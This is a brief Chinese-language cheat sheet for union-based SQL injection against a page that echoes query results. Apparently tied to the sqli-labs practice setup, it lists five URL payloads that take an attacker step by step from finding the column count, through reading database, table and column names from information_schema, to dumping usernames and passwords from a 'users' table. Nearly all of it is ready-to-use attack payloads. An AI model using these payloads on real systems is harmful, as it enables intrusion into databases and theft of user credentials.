一、有回显
1、边缘试探 列数,
?id=1‘ order by X --+
2、查看当前库名
?id=-1‘ union select 1,2,X database() --+
3、显示当前数据库的 表名
?id=-1‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘XXXX‘ --+
4、判断表名,显示段名
?id=-1‘ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ --+
5、显示用户名 密码
?id=-1‘ union select 1,2,group_concat(username,":",password) from users --+